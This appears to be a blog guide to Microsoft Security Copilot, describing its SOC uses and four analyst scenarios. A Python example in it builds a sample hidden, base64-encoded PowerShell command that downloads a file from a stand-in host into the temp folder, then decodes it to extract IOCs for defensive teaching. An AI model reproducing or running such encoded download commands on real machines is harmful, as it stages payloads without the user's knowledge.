Microsoft Security Copilot is an all-in-one virtual assistant that uses the power of AI to augment your workflow.
You have likely noticed that an AI takeover has been under way since 2023, and the cyber security industry is not immune. Security Copilot is a new cloud-based AI tool intended to help you enhance the security of your Microsoft cloud environment.
Will this new offering revolutionize cyber security as we know it today?
This comprehensive Microsoft Security Copilot guide answers this question and how to harness this new AI tool. It uses practical examples to explore how Security Copilot intends to shake up traditional approaches across various cyber security fields. Then you can judge how it stacks up against current offerings.
Let's discover how we can use Security Copilot and the power of AI!
What Is Microsoft Security Copilot?
Security Copilot Augments a Security Analyst's Workflow
Security Copilot combines the power of OpenAI's GPT-4 generative AI large language model (LLM) with a security-specific model developed by Microsoft. This allows a Security Operations Centre (SOC) analyst to prompt Security Copilot much as you would prompt ChatGPT. You ask a question, and the tool returns an AI-generated response that answers the security-related inquiry.
"Microsoft Security Copilot is an AI-powered security analysis tool that enables analysts to respond to threats quickly, process signals at machine speed, and assess risk exposure in minutes." - Microsoft
Security Copilot Has Been Created for SOC Analysts
SOC analysts are the skilled security professionals responsible for monitoring, detecting, and responding to cyber security incidents and threats. They continuously monitor an organization's network, systems, and applications to identify malicious activity and use various security tools and technologies.
Security Copilot Is Another Tool for You to Add to Your Arsenal
Microsoft claims Security Copilot allows you to augment your workflow by leveraging the power of AI in a cyber security-specific context. The tool can be applied to a broad range of key activities and responsibilities the SOC performs, from monitoring and detection to compliance and vulnerability management.
Microsoft claims Security Copilot can do the following:
How Can You Get Your Hands on Microsoft Security Copilot?
Security Copilot is currently in preview and available only to select customers. You can sign up for Microsoft's Security updates to hear about product announcements. However, at this time, there is no public release date.
How Can Microsoft Security Copilot be Used?
The power of Microsoft Security Copilot can extend across a broad spectrum of cyber security fields, from reporting to compliance monitoring. You can use the tool to help augment your workflow in any of the following disciplines:
Incident Response
You can use Security Copilot when responding to incidents through a variety of actions:
- Incident triage and assessment: Security Copilot can quickly evaluate an incident and guide your initial response steps.
- Incident containment and mitigation: Security Copilot's view into your entire cloud environment provides insight into how to contain a security incident and mitigate any further damage. For instance, what systems to isolate, what temporary security measures or controls to implement, and what patches must be deployed immediately.
- Forensic analysis and investigation: Security Copilot can quickly analyze malicious files or commands and identify Indicators of Compromise (IOCs) that you can search for in your environment to identify affected machines.
- Remediation and recovery: Security Copilot can assist in developing a remediation plan to restore affected systems and apply necessary security controls and patches to ensure the incident does not reoccur.
Without AI, these use cases would consume valuable person-hours, resulting in a less efficient response. Augmenting response with Security Copilot helps you find answers faster and limit the potential damage an ongoing attack could cause.
Threat Intelligence
Security Copilot can use Microsoft's global threat intelligence feed that ingests 65 trillion signals daily and includes the latest cyber threats affecting organizations worldwide. Security Copilot can use this feed, and other third-party intelligence feeds, to automatically identify IOCs in your environment and provide context to security alerts or aid in incident investigation.
Aside from IOCs, Security Copilot can provide analysis and reporting services to help you visualize the threat intelligence your organization is ingesting. The tool can analyze the intelligence, identify relevant patterns, and provide actionable insights to mitigate potential risks.
Threat Hunting
Threat hunting always starts with developing a hypothesis that states what the hunt will search for in your environment. According to Microsoft, Security Copilot can assist with creating a hunting hypothesis by providing security insights on the proven tactics, techniques, and procedures (TTPs) threat actors are using and by identifying potential threat scenarios.
You can then use these security insights to craft a custom hunting query with the help of Security Copilot and its integration with Microsoft's Advanced Hunting feature in Defender for Endpoint and Sentinel. These queries can carry out your threat hunt by searching attack data, such as known IOCs, suspicious activities, or patterns associated with emerging cyber threats.
Compliance Monitoring
Many businesses must comply with industry standards to protect corporate data and meet regulatory requirements. To manually audit your organization and ensure each condition is satisfied can be tedious. Microsoft claims Security Copilot can assist with this in several ways:
- Compliance policy assessment: Security Copilot can help you assess your organization's compliance with industry standards, regulatory requirements, and internal policies by evaluating the security controls across your environment.
- Automated compliance reporting and dashboards: Instead of manually creating reports or dashboards to monitor your compliance, Security Copilot can automatically generate these dashboards for you. This helps you easily track your progress toward compliance goals and demonstrate this to auditors.
- Compliance audits and remediation guidance: Security Copilot can perform comprehensive compliance audits at machine speed. Suppose you need to improve a particular area. The tool can generate remediation steps to get you up to regulatory standards. This can save you time from manual auditing and finding remediation guidance from auditors.
- Continuous monitoring of regulatory updates: As standards are updated and governing bodies change their regulatory requirements, you must stay informed and vigilant in ensuring your IT environment is compliant. Security Copilot can automatically keep you up-to-date with regulatory changes and guide how these changes may impact your compliance requirements.
Vulnerability Management
Managing vulnerabilities is a never-ending battle, with new ones emerging daily. This can get overwhelming in large IT environments that deploy various software. According to Microsoft, Security Copilot can help you stay on top of this task with its visibility of your entire cloud environment.
Security Copilot can pull real-time security data from all your endpoint devices and servers to determine software versions and match them against known vulnerabilities gathered from threat intelligence feeds. If an endpoint or server is vulnerable, it can generate remediation steps for you to mitigate the associated risks, or it can even be configured to update the vulnerable software automatically.
This capability of automatically alerting you to vulnerabilities in your environment is nothing new. Microsoft Defender for Endpoint already does this. However, using AI to generate remediation steps, automatically perform complex risk mitigation activities, or patch software without user interaction are new capabilities that significantly speed up managing vulnerabilities and improving your organization's security.
Detection Engineering
Microsoft Security Copilot is designed to learn from past incidents to generate more accurate responses in the future. Learning is done through user feedback and the analysis of big data. This means that the detections it implements will be less noisy (reduced false positives), and you will be able to focus on real incidents that require your attention. The longer Security Copilot runs, the smarter it gets.
You can also use Security Copilot to generate detection rules for you. For instance, you can ask it to create a detection that triggers when a specific new vulnerability is exploited. This saves you the time and effort of manually researching the vulnerability and writing the rule, ensuring your environment is protected much faster.
Microsoft Security Copilot in Practice
Let's look at Security Copilot in action by reviewing common real-world security incidents you will likely encounter when working in a SOC.
Scenario 1 - Reverse engineering a Malicious Payload
The Scenario
Adversaries often use malicious payloads within PowerShell scripts to attack machines in your environment. As a SOC analyst, you will encounter a malicious payload in a PowerShell script that you must decode to find IOCs to hunt for in your environment.
Without Security Copilot
This requires you to work through the script line by line and use third-party tools to decode and deobfuscate the PowerShell code before you can find IOCs to hunt for. It is a tedious, time-consuming process that requires in-depth knowledge of PowerShell.
Using Security Copilot
Security Copilot can automatically decode the script and extract the relevant IOCs for you to hunt for. You only need to copy and paste the script into the prompt, and the tool will do the rest of the work for you. This saves you time and lowers the bar regarding the required knowledge.
Microsoft showcased this capability in a live demonstration in which Security Copilot was used to reverse engineer a malicious payload.
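To make the manual decoding step concrete, here is an added example (not code from the article or from Microsoft) of what an analyst does by hand before the IOCs can be hunted: it takes a command line carrying a base64 `-EncodedCommand`, decodes the UTF-16LE script, peels any nested `FromBase64String('...')` layers, and collects URLs, IP addresses, and file paths. The sample command line and all hosts in it are constructed for this example.

```python
import base64
import re
# Constructed sample (not from the article): a benign stand-in for an encoded
# one-liner. Hosts are RFC 5737 documentation addresses, not real systems.
NESTED_B64 = base64.b64encode(b"http://198.51.100.7/c2/beacon").decode()
INNER_SCRIPT = ("$u = 'http://203.0.113.10/stage.txt'; $p = \"$env:TEMP\\update.dat\"; "
                "Invoke-WebRequest -Uri $u -OutFile $p; $c = [Text.Encoding]::UTF8.GetString("
                "[Convert]::FromBase64String('" + NESTED_B64 + "'))")
ENCODED_COMMAND = base64.b64encode(INNER_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_CMDLINE = "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_COMMAND

# -e / -ec / -enc / -EncodedCommand all carry a base64 UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
IOC_PATTERNS = {
    "urls": re.compile(r"https?://[^\s'\";)]+", re.I),
    "ips": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "paths": re.compile(r"(?:[A-Za-z]:|\$env:\w+)\\[^\s'\";)]+"),
}

def decode_bytes(raw):
    """Nested blobs are usually UTF-8; a null byte is a reliable tell for UTF-16LE."""
    codec = "utf-16-le" if b"\x00" in raw else "utf-8"
    return raw.decode(codec, errors="replace")

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None

def unwrap_layers(script, max_depth=5):
    """Return the script plus every nested FromBase64String blob, decoded, up to max_depth."""
    layers = [script]
    if max_depth > 0:
        for blob in B64_CALL.findall(script):
            try:
                inner = decode_bytes(base64.b64decode(blob, validate=True))
            except ValueError:
                continue  # not real base64; leave it for manual review
            layers += unwrap_layers(inner, max_depth - 1)
    return layers

def extract_iocs(cmdline):
    """Decode every layer and collect de-duplicated IOCs in discovery order."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {}
    found = {name: [] for name in IOC_PATTERNS}
    for layer in unwrap_layers(script):
        for name, pattern in IOC_PATTERNS.items():
            for hit in pattern.findall(layer):
                if hit not in found[name]:
                    found[name].append(hit)
    return found
```

Running `extract_iocs(SAMPLE_CMDLINE)` yields both URLs, both IP addresses, and the drop path, which is exactly the list you would then take into an Advanced Hunting query.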
Scenario 2 - Incident Response
The Scenario
Responding to incidents needs to be efficient. To do this, you must perform initial triage on alerts to determine which ones to prioritize and respond to. As a SOC analyst, you will often need to summarize an alert quickly in order to prioritize (or deprioritize) it.
Without Security Copilot
This process requires navigating to the alert using your organization's security solution (e.g., in the SIEM). Then you would have to try to gather all the relevant security data associated with this alert (e.g., affected systems, processes involved, users involved, the execution tree, etc.). Once you have all this, you need to piece it together to summarize the alert, and only then can you decide the priority of the alert.
Using Security Copilot
Security Copilot can quickly analyze an alert and provide a summary of the alert's relevant details:
Security Copilot can retrieve and analyze an alert through its integration with Microsoft Sentinel (a SIEM). This alert was raised in Sentinel and is related to "OneNote initial access," likely a phishing email that has used a malicious OneNote attachment or link. The tool can use its AI model to summarize what happened and highlight key details. It also generates a graphical view of the incident.
You can quickly read over this summary and use the graph to understand this alert. Then you can use your domain knowledge to determine the priority of this alert. Security Copilot provides useful suggestions about potential next steps if you choose to investigate further. In this incident, you can investigate the malicious file's impact on the affected system or pivot to Sentinel (Microsoft's SIEM solution) and get a general incident analysis.
This quick analysis allows you to triage alerts more efficiently, and the suggestions provided by Security Copilot, after an initial summary, will enable you to pivot into a full investigation and potential remediation effortlessly.
Scenario 3 - Threat Hunting
The Scenario
Threat hunting is a key part of any SOC. When you come across an IOC from a threat intelligence feed, you must search for it in your environment to determine if other systems have been affected.
Without Security Copilot
To perform a threat hunt using an IOC, you first need to find the IOC from a threat intelligence feed. Then you need to craft a query to search for the IOC in your environment. If you use a Microsoft tool, this would be done using an Advanced Hunting query, requiring in-depth knowledge of KQL (Microsoft's query language for its security products).
Researching the query to write and then writing the query would require time and effort, potentially giving the attacker time to spread in your environment and compromise other machines. This time is compounded if you need to perform multiple threat hunts.
Using Security Copilot
Security Copilot allows you to summarize an alert and extract relevant IOCs quickly. You pivot from a summary of an alert into a threat hunt by asking Security Copilot if an IOC has been seen anywhere else in your environment. For example, has a certain file been seen anywhere else in your environment:
Here Security Copilot has identified that a file was sent in an email from one user to another in your environment. You can then perform another threat hunt from within Security Copilot to investigate if this email has gone to other users in your environment, as they may also be compromised. This is done by selecting "Email: Look for presence":
The suggestion provided by Security Copilot lets you scan for emails that contain the compromised file and see who sent/received the file to find out if more users have been affected. It also initiates a threat hunt to investigate if there have been any suspicious logins related to the user who sent the email. This helps in determining if their account has been compromised.
Here you see the email chain with the potentially compromised user sending the email with the malicious link to two other users in the organization:
You discover that there have indeed been suspicious login attempts for the potentially compromised account that sent the malicious link. This confirms your suspicion that the account has been compromised and concludes your threat hunt:
In this scenario, Security Copilot could seamlessly perform multiple threat hunts from an initial alert about a compromised account and device. This integration with Defender for Endpoint allowed you to quickly investigate the alert and discover if other users or devices were affected.
Scenario 4 - Security Reporting
The Scenario
When working as a SOC analyst, you often need to provide reports on major incidents that you come across. This report must provide a high-level overview of an incident so your manager can use it to identify patterns or trends in the cyber attacks affecting your organization.
Without Security Copilot
Creating such reports can be tedious. You need to investigate an alert, summarize the attack data, and present it in an easily digestible format to your manager (e.g., in a PDF or PowerPoint). This process involves using multiple technologies and copying and pasting data in various locations.
Using Security Copilot
Security Copilot makes security reporting incredibly simple with its integration with Microsoft tools. You can use Security Copilot to provide an analysis of an alert, as we did previously, and then ask it to generate a PowerPoint slide that outlines this analysis:
Once Security Copilot creates this slide, you can add it to your organization's reporting slide deck and present your findings to your manager:
This transforms security reporting from a tedious process to a painless one. You will appreciate the easy creation, and your manager will appreciate the timeliness of your reports!
Conclusion
Microsoft Security Copilot will revolutionize various SOC tasks, but will it replace SOC analysts working today?
This seems unlikely in the immediate future. Security Copilot helps augment your workflow and accelerates incident investigation. It draws on the power of AI to provide you with various solutions to security problems. Still, its power comes from your prompt, guided by your domain knowledge. To use Security Copilot effectively, you need to know the right questions.
Microsoft admits in its demonstration of Security Copilot that it is still prone to error (in the demonstration, it lists Windows 9 as a legitimate operating system) and that it takes a skilled security analyst with human ingenuity to operate the tool.
That said, there are an estimated 3.4 million unfilled jobs for skilled security professionals. Security Copilot will likely fill some of this talent gap. It can augment work and allows businesses to scale their security programs fast with a relatively small team.
Like other cloud technologies, Security Copilot can speed up operations, requires fewer people to set up and maintain systems, and allows businesses to scale easily. This may mean that SOC analysts working today will need to learn new skills to align with Security Copilot, just as network engineers had to with the advent of cloud computing.
Microsoft Security Copilot is just the start of the AI revolution for cyber security.
If you would like to learn more about the topics discussed in this article, be sure to check out these resources: